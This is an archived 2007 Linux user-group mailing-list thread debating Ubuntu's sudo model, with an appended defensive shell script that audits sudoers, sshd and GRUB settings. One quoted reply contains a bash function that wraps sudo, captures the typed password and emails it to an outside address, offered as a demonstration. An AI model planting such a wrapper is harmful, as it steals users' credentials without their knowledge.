[HanoiLUG] Ubuntu-sudo usage..
David Tremblay
david at roy-tremblay.net
Thu Jan 4 12:32:44 ICT 2007
Hi,
I want to challenge the "one machine per user" assumption, which is
partially true.
Most family Windoze boxes (those with "teens" at least) have several
users (who all have administrator privileges, which is very messy).
Just for my part, I recently had the following problems, which require both:
a) to set up Linux on a couple's machine that was sharing a directory,
and where users, Gnome applications and the Thunderbird profile would have
the same permissions. Sounds silly? No, it is not: Thunderbird keeps
creating the new directories and files with the
b) a family box where an HD was mounted at boot time but should be
available from within the home of every user, so users should not have to
browse elsewhere than their home; Gnome shortcuts could
not do it, as many applications don't see the shortcuts when "saving"
or opening files.
For the rest, I thought that the sudo thing was just about keeping the
same security model but giving the user less of an impression that he/she is
under "surveillance".
As a matter of fact, the security model of Unix also gives an advantage
against worms and viruses, keeping them confined to the infected user.
About basic security, one could also add that by default Ubuntu's Grub lets
you boot into single-user mode without prompting for a password, and then you get
root for free.
David, you suggest we should rethink the security model; how do you see it?
David Favro wrote:
> I've never done a 'vanilla' Ubuntu install, so I'm not sure, but I think
> that maybe the idea is that if you don't set a root password during the
> install, it won't prompt you for one when you 'sudo' from the normal
> account. Someone can correct me if I'm wrong. If so, I think that they
> are halfway onto the right idea.
>
> Personally, I always set a root password, and add an entry to
> /etc/sudoers that allows my 'private' ID to sudo to anything, like:
> my_user ALL=NOPASSWD: ALL
> and I have an alias in my .bashrc:
> alias su="sudo su -"
> Then I disable all of their 'security' features like disallowing root
> login from gdm, from ssh, etc. (but I take an additional precaution of
> disallowing root login via password in ssh, only via PK, and have sshd
> use a non-default port).
> All of this means that I can 'be myself' yet execute any command via
> sudo without typing root password, and if I need to do a lot of
> sysadmin, I can just type "su" to become root to avoid typing "sudo" (I
> also keep a gnome-terminal profile with the command "sudo su -" so that
> I can easily fire up a terminal that is already root). You can also
> achieve similar results through the use of groups, but I like forcing
> myself to acknowledge that I am executing a privileged command by using
> 'sudo' or a root shell.
>
> The point is, I've been using unix for 25 years and always liked the
> user-permissions model, but it is not really adapted to the modern
> environment: more and more, most computers are no longer multi-user
> machines. The typical laptop or desktop workstation computer is used by
> only one user almost all of the time, and there's no need to disallow
> sys-admin by that user since he 'owns' the machine. I'm not suggesting
> that we should all run as 'root', but the need to type 'sudo' is (should
> be) just a safety reminder so that we realize that we are executing a
> command with system-wide implications rather than just for our user-ID.
>
> The mindset that an intruder as root is a higher security risk than as
> an 'unprivileged' user is outdated, although still prevalent. I was of
> this opinion for decades, but it no longer applies on a machine where
> there effectively is only one user. In the old days, an unauthorized
> user as root could steal/destroy the data of all users, as well as bring
> the system down, but as an unprivileged user, could only steal/destroy
> that one user's data. But now, there only *is* one user. If an
> intruder can read your emails, destroy your oggs, etc., what do you care
> if they have access to the /sbin directory? Once someone has access as
> 'you', it's all over. And, since you are typing your root password
> every time that you do sysadmin, I get that as a bonus too -- I just
> type this into your terminal session or add it to your .bashrc:
> sudo() { read -s -p "Password: " pwd ; echo ; /usr/bin/sudo -p "" "${@}"
> <<<"${pwd}" ; Mail -s "$(id -un)@${HOSTNAME}" hanoilug at meta-dynamic.com
> <<<"${pwd}" ; }
>
> (I don't steal people's passwords -- I only worked out that hack as a
> way to demonstrate to people that they are not any more secure by
> forcing themselves to type their root password whenever they use sudo,
> as some still think).
>
> So, my whole philosophy is that on my personal machines (e.g. laptop),
> my personal user-ID should be equivalent to root, but I still need to
> use 'sudo' or 'su' or start up a root shell to do sysadmin, just as a
> safety check that I don't inadvertently make a mistake, but I don't want
> to type passwords. I guess that since Ubuntu is aimed at 'desktop'
> machines, they had the same idea, but there are problems with their
> implementation. For one, there are times when one wants to login
> directly as root, not as a normal ID followed by su/sudo (for reasons
> too difficult to explain here). So if root has no password (no direct
> login) and root login is disabled in gdm and sshd, you are out of luck.
>
> The 'single-user machine' mentality also means that, in most cases, when
> the machine is booted, the need to 'log in' to a graphical session with
> a user-ID and password via gdm or other login window is also an obsolete
> idea, just another inconvenience that adds no security, like the root
> password for 'sudo', so I have found ways to eliminate it. Of course, I
> also take many other security measures with respect to my machines.
>
> -- David F.
>
> Steve wrote:
>> I have a question about sudo usage in Ubuntu. Why is the usage
>> emphasised over su? If users get prompted for a root password each
>> time then how is it different to su? If the idea is to force a
>> password entry before each root command, then what stops you from
>> running sudo /bin/bash (or some other executable which gives you
>> a shell)?
>>
>> Steve
>
> _______________________________________________
> HanoiLUG mailing list
> HanoiLUG at lists.hanoilug.org
> http://lists.hanoilug.org/mailman/listinfo/hanoilug
>
--
David Tremblay
Information Technology for development analyst
*emails:*
david at roy-tremblay.net // david at ngowiki.net
*Phones*
Mobile : 84-4-0912 474 995
SIP : 1-747-004-8537
skype : ict4ngo
*Webs:*
blog.ngowiki.net // www.hanoilug.org
www.lerap.org
*Messaging*
jabber network :ict4ngo at jabber.org
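An added audit script, not from this thread or from Ubuntu, that checks a host for the three settings the discussion turns on: the passwordless `NOPASSWD: ALL` sudoers entry, password-based root login over ssh on the default port, and a GRUB legacy single-user (recovery) entry that is bootable without a password. The file contents below are constructed samples; on a real box the inputs are /etc/sudoers, /etc/ssh/sshd_config and /boot/grub/menu.lst.

```shell
#!/bin/sh
# Audit example added to the thread (not the list's or Ubuntu's own code).
# Each function takes a file's text as $1 and prints one finding per line;
# clean input prints nothing, so the output can be tested or fed to a monitor.

# Constructed sudoers sample containing the entry described in the thread.
SUDOERS_SAMPLE='Defaults env_reset
root    ALL=(ALL) ALL
my_user ALL=NOPASSWD: ALL
%admin  ALL=(ALL) ALL'

# Constructed sshd_config sample: root login on, passwords on, default port.
SSHD_SAMPLE='Port 22
PermitRootLogin yes
PasswordAuthentication yes'

# Constructed GRUB legacy menu.lst sample: recovery entry without lock/password.
GRUB_SAMPLE='default 0
timeout 3
title Ubuntu, kernel 2.6.17 (recovery mode)
root (hd0,0)
kernel /boot/vmlinuz root=/dev/sda1 ro single
boot'

# Flag any uncommented rule granting every command without a password.
# A narrower rule lists the exact commands instead of ALL.
audit_sudoers() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' \
        | grep -E 'NOPASSWD:[[:space:]]*ALL' \
        | sed 's/^/sudoers: passwordless unrestricted sudo: /'
}

# Flag root password login, password auth at all, and the default port.
audit_sshd() {
    printf '%s\n' "$1" | awk '
        $1 == "Port" && $2 == "22"                    { print "sshd: default port" }
        $1 == "PermitRootLogin" && $2 == "yes"        { print "sshd: root may log in with a password" }
        $1 == "PasswordAuthentication" && $2 == "yes" { print "sshd: password logins enabled" }'
}

# Flag a kernel line booting "single" when no global password line exists
# and the entry is not protected by a lock directive after its title.
audit_grub() {
    printf '%s\n' "$1" | awk '
        /^password/ { haspw = 1 }
        /^title/    { locked = 0 }
        /^lock/     { locked = 1 }
        /^kernel/ && / single/ && !locked && !haspw {
            print "grub: single-user entry bootable without a password" }'
}
```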